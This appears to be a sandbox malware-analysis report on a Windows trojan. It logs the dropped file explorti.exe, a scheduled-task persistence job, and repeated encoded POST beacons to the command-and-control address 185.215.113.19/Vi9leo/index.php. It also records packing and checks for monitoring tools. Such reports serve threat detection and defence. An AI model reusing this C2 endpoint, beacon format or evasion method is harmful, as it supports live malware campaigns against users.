Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.19 185.215.113.19

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_0069BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

5_2_0069BD60

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php4
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php6
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php?
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC:
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpH
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpeb8a7
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpon
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phprosoft
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpsM

System Summary

PE file contains section with special chars

Source: 11NdzR12PS.exe	Static PE information: section name:
Source: 11NdzR12PS.exe	Static PE information: section name: .idata
Source: 11NdzR12PS.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Windows\Tasks\explorti.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D3068	5_2_006D3068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_0069E440	5_2_0069E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_00694CF0	5_2_00694CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006C7D83	5_2_006C7D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D765B	5_2_006D765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_00694AF0	5_2_00694AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D777B	5_2_006D777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D8720	5_2_006D8720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D6F09	5_2_006D6F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_006D2BD0	5_2_006D2BD0

Source: 11NdzR12PS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11NdzR12PS.exe	Static PE information: Section: ZLIB complexity 0.9997064976092896
Source: 11NdzR12PS.exe	Static PE information: Section: wokugkrf ZLIB complexity 0.9944071718563766
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9997064976092896
Source: explorti.exe.0.dr	Static PE information: Section: wokugkrf ZLIB complexity 0.9944071718563766

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: 11NdzR12PS.exe

Virustotal: Detection: 53%

Source: 11NdzR12PS.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File read: C:\Users\user\Desktop\11NdzR12PS.exe

Source: unknown	Process created: C:\Users\user\Desktop\11NdzR12PS.exe "C:\Users\user\Desktop\11NdzR12PS.exe"
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Detected unpacking (changes PE section rights)

Source: 11NdzR12PS.exe

Static file information: File size 1921536 > 1048576

Source: 11NdzR12PS.exe

Static PE information: Raw size of wokugkrf is bigger than: 0x100000 < 0x1a3800

Data Obfuscation

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Unpacked PE file: 0.2.11NdzR12PS.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 5.2.explorti.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1db077 should be: 0x1e273f
Source: 11NdzR12PS.exe	Static PE information: real checksum: 0x1db077 should be: 0x1e273f

PE file contains sections with non-standard names

Source: 11NdzR12PS.exe	Static PE information: section name:
Source: 11NdzR12PS.exe	Static PE information: section name: .idata
Source: 11NdzR12PS.exe	Static PE information: section name:
Source: 11NdzR12PS.exe	Static PE information: section name: wokugkrf
Source: 11NdzR12PS.exe	Static PE information: section name: csqdmnjl
Source: 11NdzR12PS.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: wokugkrf
Source: explorti.exe.0.dr	Static PE information: section name: csqdmnjl
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 5_2_006AD84C push ecx; ret

5_2_006AD85F

Source: 11NdzR12PS.exe	Static PE information: section name: entropy: 7.980756696745502
Source: 11NdzR12PS.exe	Static PE information: section name: wokugkrf entropy: 7.954605137442367
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.980756696745502
Source: explorti.exe.0.dr	Static PE information: section name: wokugkrf entropy: 7.954605137442367

Drops PE files

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
